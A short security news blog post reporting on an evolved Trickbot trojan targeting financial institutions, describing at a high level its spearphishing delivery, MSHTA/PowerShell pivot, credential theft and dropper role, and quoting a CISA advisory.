DecryptedTech

Wednesday06 July 2022

Trickbot Evolves as The Developers Target Customers of Multiple Financial Institutions


Reading time is around minutes.

Researchers have identified Trickbot in use in campaigns targeting several financial institutions. These groups along with a few tech companies thrown in a predominantly in the US and appear to be using an evolved version of the malware to get in and avoid detection by legacy anti-malware (signature based). It is usually part of a targeted spearphishing campaign where poisoned office documents are either contain links to malicious websites or can contain HTA code to execute a PowerShell command to download the second stage of the malware.

It is a nasty little trojan to begin with and many companies were caught up by it as few anti-malware solutions were really looking for the MSHTA pivot that was included. There are still far too many solutions that do not see that pivot and rely on detection signatures for the malware payload. This has led the malware developers to start working on additional techniques to avoid detection by them.

One of the primary functions of Trickbot is to steal credentials for use in obtaining further access or to exfiltrate data. It does this through a Man in the Browser tactic (T1185). It can also gather information through other methods as the malware acts as a dropper. Researchers have observed Trickbot used to deploy ransomware, and the Emotet Cryptominer (I have seen this one firsthand). Trickbot has multiple methods to maintain persistence on a targeted device. It really is like the Swiss Army Knife of malware. According to CISA:

“TrickBot is capable of data exfiltration over a hardcoded C2 server, cryptomining, and host enumeration (e.g., reconnaissance of Unified Extensible Firmware Interface or Basic Input/Output System [UEFI/BIOS] firmware) (Exfiltration Over C2 Channel [T1041], Resource Hijacking [T1496], System Information Discovery.[2] For host enumeration, operators deliver TrickBot in modules containing a configuration file with specific tasks.”

Trickbot has been known to spread over SMBv1 using captured credentials. This is not that much of a concern as everyone has this disabled right? It also relies on several pivots that should be disabled in most environments and even in the consumer market. The reliance malicious websites, documents and even SMBv1 are all things that should, at this stage, not be an option for attackers. Clearly there is a lot more work to be done in the security world as this type of malware continues to flourish and be effective.

Leave a comment

Make sure you enter all the required information, indicated by an asterisk (*). HTML code is not allowed.